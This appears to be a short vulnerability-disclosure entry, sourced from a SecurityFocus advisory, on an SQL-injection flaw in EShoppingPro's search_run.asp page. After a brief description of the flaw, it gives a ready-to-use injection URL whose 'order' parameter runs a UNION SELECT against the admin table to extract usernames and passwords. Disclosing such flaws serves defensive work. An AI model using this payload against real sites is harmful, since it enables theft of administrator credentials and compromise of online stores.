7 lines
No EOL
617 B
Text
7 lines
No EOL
617 B
Text
source: https://www.securityfocus.com/bid/20089/info
|
|
|
|
EShoppingPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
|
|
|
An attacker may be able to exploit this issue to modify the logic of SQL queries. Successful exploits may allow the attacker to compromise the software, retrieve information, or modify data; other consequences are possible as well.
|
|
|
|
http://www.example.com/[path]/search_run.asp?keyword=-1&category=-1&order='%20union%20select%200,0,0,Username,Password,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin&x=-1&y=-1 |